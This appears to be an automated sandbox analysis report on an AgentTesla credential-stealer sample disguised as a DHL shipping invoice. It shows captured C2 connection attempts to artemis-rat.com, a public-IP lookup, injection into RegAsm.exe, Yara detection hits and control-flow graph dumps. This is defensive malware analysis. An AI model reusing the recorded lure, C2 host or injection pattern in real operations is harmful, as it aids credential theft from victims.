                            2024-03-12 07:36:57 UTC728INData Raw: 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 39 35 62 38 34 65 65 36 62 63 33 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72
                            Data Ascii: ipt><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.js"></script><scr
                            2024-03-12 07:36:57 UTC1370INData Raw: 35 44 31 34 0d 0a 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 74 61 73 6b 2d 6c 69 73 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6f 6e 66 6f 63 75 73 5f 74 73 2d 61 70 70 5f 61 73 73 2d 34 32 31 63 65 63 2d 39 64 65 34 32 31 33 30 31 35 61 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65
                            Data Ascii: 5D14efer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js"></script><script crossorigin="anonymous" de


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.455569104.21.54.1584436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            2024-03-12 07:37:08 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            2024-03-12 07:37:08 UTC161INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:08 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            2024-03-12 07:37:08 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.455642222.255.238.1594436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            2024-03-12 07:37:10 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            2024-03-12 07:37:10 UTC192INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:10 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 613
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2024-03-12 07:37:10 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.455711172.67.74.15244344380C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            TimestampBytes transferredDirectionData
                            2024-03-12 07:37:13 UTC155OUTGET / HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                            Host: api.ipify.org
                            Connection: Keep-Alive
                            2024-03-12 07:37:13 UTC211INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:13 GMT
                            Content-Type: text/plain
                            Content-Length: 14
                            Connection: close
                            Vary: Origin
                            CF-Cache-Status: DYNAMIC
                            Server: cloudflare
                            CF-RAY: 86321e24383e4231-EWR
                            2024-03-12 07:37:13 UTC14INData Raw: 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 37
                            Data Ascii: 191.96.150.227


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:08:36:54
                            Start date:12/03/2024
                            Path:C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            Imagebase:0x1b9f1850000
                            File size:39'936 bytes
                            MD5 hash:951577B697A1CAF07EEA6946C91FCD44
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:2
                            Start time:08:37:08
                            Start date:12/03/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                            Imagebase:0x580000
                            File size:65'440 bytes
                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2903520132.000000000291B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2903520132.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2903520132.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2903520132.000000000292C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:false

                            Target ID:5
                            Start time:08:37:12
                            Start date:12/03/2024
                            Path:C:\Windows\System32\WerFault.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\WerFault.exe -u -p 6484 -s 123052
                            Imagebase:0x7ff67e2f0000
                            File size:570'736 bytes
                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Reset < >

                              Execution Graph

                              Execution Coverage:11.4%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:117
                              Total number of Limit Nodes:15
                              execution_graph 40347 62f6e48 40348 62f6e8e GetCurrentProcess 40347->40348 40350 62f6ed9 40348->40350 40351 62f6ee0 GetCurrentThread 40348->40351 40350->40351 40352 62f6f1d GetCurrentProcess 40351->40352 40353 62f6f16 40351->40353 40354 62f6f53 40352->40354 40353->40352 40355 62f6f7b GetCurrentThreadId 40354->40355 40356 62f6fac 40355->40356 40357 2820848 40359 282084e 40357->40359 40358 282091b 40359->40358 40364 62f5d30 40359->40364 40368 62f5d40 40359->40368 40372 2821487 40359->40372 40380 282137f 40359->40380 40365 62f5d1a 40364->40365 40365->40364 40388 62f5728 40365->40388 40369 62f5d4f 40368->40369 40370 62f5728 2 API calls 40369->40370 40371 62f5d70 40370->40371 40371->40359 40374 2821396 40372->40374 40375 282148b 40372->40375 40373 2821484 40373->40359 40374->40373 40376 2821487 2 API calls 40374->40376 40456 2827d90 40374->40456 40460 2827d2c 40374->40460 40464 2827ea8 40374->40464 40375->40359 40376->40374 40381 282130a 40380->40381 40383 2821383 40380->40383 40381->40359 40382 2821484 40382->40359 40383->40382 40384 2827d90 2 API calls 40383->40384 40385 2827ea8 2 API calls 40383->40385 40386 2827d2c 2 API calls 40383->40386 40387 2821487 2 API calls 40383->40387 40384->40383 40385->40383 40386->40383 40387->40383 40389 62f5733 40388->40389 40392 62f6bcc 40389->40392 40391 62f76f6 40391->40391 40393 62f6bd7 40392->40393 40394 62f7e1c 40393->40394 40397 62f96a0 40393->40397 40402 62f9690 40393->40402 40394->40391 40399 62f96c1 40397->40399 40398 62f96e5 40398->40394 40399->40398 40407 62f983f 40399->40407 40411 62f9850 40399->40411 40403 62f9694 40402->40403 40404 62f96e5 40403->40404 40405 62f983f 2 API calls 40403->40405 40406 62f9850 2 API calls 40403->40406 40404->40394 40405->40404 40406->40404 40408 62f9850 40407->40408 40409 62f9896 40408->40409 40415 62f7bdc 40408->40415 40409->40398 40412 62f985d 40411->40412 40413 62f7bdc 2 API calls 40412->40413 40414 62f9896 40412->40414 40413->40414 40414->40398 40416 62f7be7 40415->40416 40418 62f9d08 40416->40418 40419 62f7bec 40416->40419 40418->40418 40420 62f7bf7 40419->40420 40426 62f98cc 40420->40426 40422 62f9d77 40430 62ff080 40422->40430 40435 62ff098 40422->40435 40423 62f9db1 40423->40418 40427 62f98d7 40426->40427 40428 62fb000 40427->40428 40429 62f96a0 2 API calls 40427->40429 40428->40422 40429->40428 40431 62ff090 40430->40431 40432 62ff0d5 40431->40432 40441 62ff300 40431->40441 40445 62ff310 40431->40445 40432->40423 40437 62ff0c9 40435->40437 40438 62ff115 40435->40438 40436 62ff0d5 40436->40423 40437->40436 40439 62ff300 2 API calls 40437->40439 40440 62ff310 2 API calls 40437->40440 40438->40423 40439->40438 40440->40438 40442 62ff310 40441->40442 40448 62ff350 40442->40448 40443 62ff31a 40443->40432 40447 62ff350 2 API calls 40445->40447 40446 62ff31a 40446->40432 40447->40446 40449 62ff371 40448->40449 40450 62ff394 40448->40450 40449->40450 40454 62ff5e8 LoadLibraryExW 40449->40454 40455 62ff5f8 LoadLibraryExW 40449->40455 40450->40443 40451 62ff598 GetModuleHandleW 40453 62ff5c5 40451->40453 40452 62ff38c 40452->40450 40452->40451 40453->40443 40454->40452 40455->40452 40457 2827da6 40456->40457 40459 2827f12 40457->40459 40471 282f3e7 40457->40471 40459->40374 40461 2827d90 40460->40461 40462 282f3e7 2 API calls 40461->40462 40463 2827f12 40461->40463 40462->40463 40463->40374 40465 2827eb2 40464->40465 40467 2827ecc 40465->40467 40469 631faa8 2 API calls 40465->40469 40470 631fa98 2 API calls 40465->40470 40466 2827f12 40466->40374 40467->40466 40468 282f3e7 2 API calls 40467->40468 40468->40466 40469->40467 40470->40467 40472 282f3f2 40471->40472 40476 631faa8 40472->40476 40480 631fa98 40472->40480 40473 282f3f9 40473->40459 40478 631fabd 40476->40478 40477 631fcd2 40477->40473 40478->40477 40479 631fce9 GlobalMemoryStatusEx GlobalMemoryStatusEx 40478->40479 40479->40478 40481 631fabd 40480->40481 40482 631fcd2 40481->40482 40483 631fce9 GlobalMemoryStatusEx GlobalMemoryStatusEx 40481->40483 40482->40473 40483->40481 40484 62f7092 DuplicateHandle 40485 62f7126 40484->40485 40486 62f30f0 40487 62f3080 SetWindowsHookExA 40486->40487 40490 62f30fe 40486->40490 40489 62f30c2 40487->40489

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 127 63130a8-63130c9 128 63130cb-63130ce 127->128 129 63130d0-63130ef 128->129 130 63130f4-63130f7 128->130 129->130 131 6313898-631389a 130->131 132 63130fd-631311c 130->132 133 63138a1-63138a4 131->133 134 631389c 131->134 140 6313135-631313f 132->140 141 631311e-6313121 132->141 133->128 137 63138aa-63138b3 133->137 134->133 144 6313145-6313154 140->144 141->140 142 6313123-6313133 141->142 142->144 253 6313156 call 63138c0 144->253 254 6313156 call 63138c8 144->254 146 631315b-6313160 147 6313162-6313168 146->147 148 631316d-631344a 146->148 147->137 169 6313450-63134ff 148->169 170 631388a-6313897 148->170 179 6313501-6313526 169->179 180 6313528 169->180 182 6313531-6313544 179->182 180->182 184 6313871-631387d 182->184 185 631354a-631356c 182->185 184->169 186 6313883 184->186 185->184 188 6313572-631357c 185->188 186->170 188->184 189 6313582-631358d 188->189 189->184 190 6313593-6313669 189->190 202 6313677-63136a7 190->202 203 631366b-631366d 190->203 207 63136b5-63136c1 202->207 208 63136a9-63136ab 202->208 203->202 209 6313721-6313725 207->209 210 63136c3-63136c7 207->210 208->207 212 6313862-631386b 209->212 213 631372b-6313767 209->213 210->209 211 63136c9-63136f3 210->211 220 6313701-631371e 211->220 221 63136f5-63136f7 211->221 212->184 212->190 223 6313775-6313783 213->223 224 6313769-631376b 213->224 220->209 221->220 227 6313785-6313790 223->227 228 631379a-63137a5 223->228 224->223 227->228 233 6313792 227->233 231 63137a7-63137ad 228->231 232 63137bd-63137ce 228->232 234 63137b1-63137b3 231->234 235 63137af 231->235 237 63137d0-63137d6 232->237 238 63137e6-63137f2 232->238 233->228 234->232 235->232 239 63137d8 237->239 240 63137da-63137dc 237->240 242 63137f4-63137fa 238->242 243 631380a-631385b 238->243 239->238 240->238 244 63137fc 242->244 245 63137fe-6313800 242->245 243->212 244->243 245->243 253->146 254->146
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-2392861976
                              • Opcode ID: aa7b01d5cd3c6fd983acbea09dcffac40c03f82e485c1bcfb4fcc27530ebed21
                              • Instruction ID: 3869c137d642cd260e600aa0c5e62e7fa4b15c2b808ad6e68cca4d490fcfad4b
                              • Opcode Fuzzy Hash: aa7b01d5cd3c6fd983acbea09dcffac40c03f82e485c1bcfb4fcc27530ebed21
                              • Instruction Fuzzy Hash: DB322135E1061ACFDB14EF79C85459DF7B6FF89300F20C6AAD409AB264EB309985CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 841 6317dc0-6317dde 842 6317de0-6317de3 841->842 843 6317de5-6317dff 842->843 844 6317e04-6317e07 842->844 843->844 845 6317e14-6317e17 844->845 846 6317e09-6317e13 844->846 847 6317e19-6317e35 845->847 848 6317e3a-6317e3d 845->848 847->848 850 6317e54-6317e56 848->850 851 6317e3f-6317e4d 848->851 854 6317e58 850->854 855 6317e5d-6317e60 850->855 857 6317e66-6317e7c 851->857 859 6317e4f 851->859 854->855 855->842 855->857 861 6317e82-6317e8b 857->861 862 6318097-63180a1 857->862 859->850 863 6317e91-6317eae 861->863 864 63180a2-63180b4 861->864 871 6318084-6318091 863->871 872 6317eb4-6317edc 863->872 867 63180b6-63180c6 864->867 868 63180cb-63180d7 864->868 867->868 870 63180d9-63180dc 868->870 873 6318311-6318314 870->873 874 63180e2-63180f1 870->874 871->861 871->862 872->871 893 6317ee2-6317eeb 872->893 875 6318337-631833a 873->875 876 6318316-6318332 873->876 881 6318110-6318154 874->881 882 63180f3-631810e 874->882 878 6318340-631834c 875->878 879 63183e5-63183e7 875->879 876->875 886 6318357-6318359 878->886 883 63183e9 879->883 884 63183ee-63183f1 879->884 899 63182e5-63182fb 881->899 900 631815a-631816b 881->900 882->881 883->884 884->870 887 63183f7-6318400 884->887 889 6318371-6318375 886->889 890 631835b-6318361 886->890 897 6318383 889->897 898 6318377-6318381 889->898 895 6318363 890->895 896 6318365-6318367 890->896 893->864 901 6317ef1-6317f0d 893->901 895->889 896->889 903 6318388-631838a 897->903 898->903 899->873 912 6318171-631818e 900->912 913 63182d0-63182df 900->913 909 6317f13-6317f3d 901->909 910 6318072-631807e 901->910 906 631839b-63183d4 903->906 907 631838c-631838f 903->907 906->874 928 63183da-63183e4 906->928 907->887 926 6317f43-6317f6b 909->926 927 6318068-631806d 909->927 910->871 910->893 912->913 921 6318194-631828a call 63165d8 912->921 913->899 913->900 976 6318298 921->976 977 631828c-6318296 921->977 926->927 934 6317f71-6317f9f 926->934 927->910 934->927 939 6317fa5-6317fae 934->939 939->927 941 6317fb4-6317fe6 939->941 949 6317ff1-631800d 941->949 950 6317fe8-6317fec 941->950 949->910 952 631800f-6318066 call 63165d8 949->952 950->927 951 6317fee 950->951 951->949 952->910 978 631829d-631829f 976->978 977->978 978->913 979 63182a1-63182a6 978->979 980 63182b4 979->980 981 63182a8-63182b2 979->981 982 63182b9-63182bb 980->982 981->982 982->913 983 63182bd-63182c9 982->983 983->913
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q
                              • API String ID: 0-355816377
                              • Opcode ID: aa06abfc4ff4256c3c53c6204908704f9a191aa108b7610e075047eff75a2ca7
                              • Instruction ID: e4fd856edc37b14c9de3cee3b3bd4457eacc9c0f89aaff6f44fcd0d0c2184968
                              • Opcode Fuzzy Hash: aa06abfc4ff4256c3c53c6204908704f9a191aa108b7610e075047eff75a2ca7
                              • Instruction Fuzzy Hash: A9028E34B002099FDB58DB78D9846AEB7E2EF84304F248569D806DB394DB31ED86CBD5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1117 282e291-282e2b2 1118 282e316-282e31d 1117->1118 1119 282e2b4-282e2f3 1117->1119 1126 282e2f5-282e300 1119->1126 1127 282e31e-282e385 1119->1127 1130 282e307-282e30e 1126->1130 1137 282e387-282e389 1127->1137 1138 282e38e-282e39e 1127->1138 1130->1118 1139 282e62d-282e634 1137->1139 1140 282e3a0 1138->1140 1141 282e3a5-282e3b5 1138->1141 1140->1139 1143 282e614-282e622 1141->1143 1144 282e3bb-282e3c9 1141->1144 1147 282e635-282e6ae 1143->1147 1149 282e624-282e628 call 2827b00 1143->1149 1144->1147 1148 282e3cf 1144->1148 1148->1147 1150 282e460-282e481 1148->1150 1151 282e486-282e4a7 1148->1151 1152 282e5c7-282e5e2 call 2820350 1148->1152 1153 282e5e4-282e606 1148->1153 1154 282e608-282e612 1148->1154 1155 282e56e-282e594 1148->1155 1156 282e4ac-282e4cd 1148->1156 1157 282e52c-282e569 1148->1157 1158 282e3ed-282e40e 1148->1158 1159 282e4d2-282e4fa 1148->1159 1160 282e413-282e435 1148->1160 1161 282e3d6-282e3e8 1148->1161 1162 282e43a-282e45b 1148->1162 1163 282e599-282e5c5 1148->1163 1164 282e4ff-282e527 1148->1164 1149->1139 1150->1139 1151->1139 1152->1139 1153->1139 1154->1139 1155->1139 1156->1139 1157->1139 1158->1139 1159->1139 1160->1139 1161->1139 1162->1139 1163->1139 1164->1139
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2902789579.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_2820000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: Xbq$$^q
                              • API String ID: 0-1593437937
                              • Opcode ID: ad8ac60e77fc094636c1ea4e40e806bb29d3a116ba6b1e904554a8cef1227a9c
                              • Instruction ID: 6d4605d12b370ddb529ddc48178fe614b9d95009b807b14cde8ccbc50566e655
                              • Opcode Fuzzy Hash: ad8ac60e77fc094636c1ea4e40e806bb29d3a116ba6b1e904554a8cef1227a9c
                              • Instruction Fuzzy Hash: DCB1F678F042188FDB18AB79985827E7BA7BFC8700F04886ED446D7385DE349C46CB96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2902789579.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_2820000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 859b38281ba78ccb515a8646b03cb0dafaf6f0e7de997f2af357432e580394b6
                              • Instruction ID: a1e36740ee92cf59d67875db7fe018f07f58d2d7c0360f666b1d025b6c76b5a0
                              • Opcode Fuzzy Hash: 859b38281ba78ccb515a8646b03cb0dafaf6f0e7de997f2af357432e580394b6
                              • Instruction Fuzzy Hash: FF53E935C10B1A8ADB11EF68C950699F7B1FF99300F15D79AE458BB221EB70AAC4CF41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1903 63155e0-63155fd 1904 63155ff-6315602 1903->1904 1905 6315604-631560a 1904->1905 1906 631563a-631563d 1904->1906 1907 6315610-6315618 1905->1907 1908 63157b4-63157e3 1905->1908 1909 6315645-6315648 1906->1909 1910 631563f-6315640 1906->1910 1907->1908 1913 631561e-631562b 1907->1913 1925 63157ed-63157f0 1908->1925 1911 631564a-631564d 1909->1911 1912 631567c-6315682 1909->1912 1910->1909 1914 631564f-6315653 1911->1914 1915 631565e-6315661 1911->1915 1917 6315684 1912->1917 1918 631569f-63156a9 1912->1918 1913->1908 1919 6315631-6315635 1913->1919 1920 63157a6-63157b3 1914->1920 1921 6315659 1914->1921 1922 6315663-6315672 1915->1922 1923 6315677-631567a 1915->1923 1924 6315689-631568c 1917->1924 1928 63156b0-63156b2 1918->1928 1919->1906 1921->1915 1922->1923 1923->1912 1923->1924 1926 631569a-631569d 1924->1926 1927 631568e-6315695 1924->1927 1931 6315812-6315815 1925->1931 1932 63157f2-63157f6 1925->1932 1926->1918 1929 63156b7-63156ba 1926->1929 1927->1926 1928->1929 1933 63156c6-63156c9 1929->1933 1934 63156bc-63156c5 1929->1934 1937 6315837-631583a 1931->1937 1938 6315817-631581b 1931->1938 1935 63157fc-6315804 1932->1935 1936 63158de-631591c 1932->1936 1941 63156e6-63156e9 1933->1941 1942 63156cb-63156e1 1933->1942 1935->1936 1943 631580a-631580d 1935->1943 1958 631591e-6315921 1936->1958 1939 6315852-6315855 1937->1939 1940 631583c-631584d 1937->1940 1938->1936 1944 6315821-6315829 1938->1944 1946 6315873-6315876 1939->1946 1947 6315857-631585b 1939->1947 1940->1939 1948 63156f0-63156f3 1941->1948 1949 63156eb-63156ed 1941->1949 1942->1941 1943->1931 1944->1936 1945 631582f-6315832 1944->1945 1945->1937 1956 6315880-6315883 1946->1956 1957 6315878-631587f 1946->1957 1947->1936 1953 6315861-6315869 1947->1953 1954 63156f5-6315702 1948->1954 1955 6315707-631570a 1948->1955 1949->1948 1953->1936 1959 631586b-631586e 1953->1959 1954->1955 1962 631573d-6315743 1955->1962 1963 631570c-631570f 1955->1963 1960 6315885-6315889 1956->1960 1961 631589d-63158a0 1956->1961 1964 6315923-6315934 1958->1964 1965 631593f-6315942 1958->1965 1959->1946 1960->1936 1972 631588b-6315893 1960->1972 1966 63158b1-63158b4 1961->1966 1967 63158a2-63158ac 1961->1967 1962->1905 1970 6315749 1962->1970 1973 6315711-6315717 1963->1973 1974 631571e-6315721 1963->1974 1991 6315a03-6315a0a 1964->1991 1992 631593a 1964->1992 1968 6315944-6315957 1965->1968 1969 631595a-631595d 1965->1969 1978 63158c4-63158c6 1966->1978 1979 63158b6-63158bd 1966->1979 1967->1966 1980 631597b-631597e 1969->1980 1981 631595f-6315970 1969->1981 1982 631574e-6315751 1970->1982 1972->1936 1983 6315895-6315898 1972->1983 1984 6315730-6315733 1973->1984 1985 6315719 1973->1985 1976 6315723-6315726 1974->1976 1977 631572b-631572e 1974->1977 1976->1977 1977->1984 1993 6315738-631573b 1977->1993 1989 63158c8 1978->1989 1990 63158cd-63158d0 1978->1990 1987 63158d6-63158dd 1979->1987 1988 63158bf 1979->1988 1997 6315980-6315991 1980->1997 1998 6315998-631599b 1980->1998 1981->1991 2011 6315976 1981->2011 1995 6315753-6315768 1982->1995 1996 631576d-6315770 1982->1996 1983->1961 1984->1993 1985->1974 1988->1978 1989->1990 1990->1925 1990->1987 2001 6315a0f-6315a12 1991->2001 1992->1965 1993->1962 1993->1982 1995->1996 2003 6315772-631578f 1996->2003 2004 6315794-6315796 1996->2004 1997->1968 2019 6315993 1997->2019 1999 63159a9-63159ac 1998->1999 2000 631599d-63159a4 1998->2000 2007 63159b6-63159b9 1999->2007 2008 63159ae-63159b3 1999->2008 2000->1999 2009 6315cf8-6315cfa 2001->2009 2010 6315a18-6315bac 2001->2010 2003->2004 2005 6315798 2004->2005 2006 631579d-63157a0 2004->2006 2005->2006 2006->1904 2006->1920 2014 63159d3-63159d6 2007->2014 2015 63159bb-63159cc 2007->2015 2008->2007 2016 6315d01-6315d04 2009->2016 2017 6315cfc 2009->2017 2052 6315ce2-6315cf5 2010->2052 2053 6315bb2-6315bb9 2010->2053 2011->1980 2020 63159f4-63159f7 2014->2020 2021 63159d8-63159e9 2014->2021 2015->1991 2027 63159ce 2015->2027 2016->1958 2022 6315d0a-6315d13 2016->2022 2017->2016 2019->1998 2020->2010 2026 63159f9-63159fc 2020->2026 2021->1964 2031 63159ef 2021->2031 2026->2010 2029 63159fe-6315a01 2026->2029 2027->2014 2029->1991 2029->2001 2031->2020 2054 6315c6d-6315c74 2053->2054 2055 6315bbf-6315bf2 2053->2055 2054->2052 2057 6315c76-6315ca9 2054->2057 2066 6315bf4 2055->2066 2067 6315bf7-6315c38 2055->2067 2068 6315cab 2057->2068 2069 6315cae-6315cdb 2057->2069 2066->2067 2077 6315c50-6315c57 2067->2077 2078 6315c3a-6315c4b 2067->2078 2068->2069 2069->2022 2080 6315c5f-6315c61 2077->2080 2078->2022 2080->2022
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
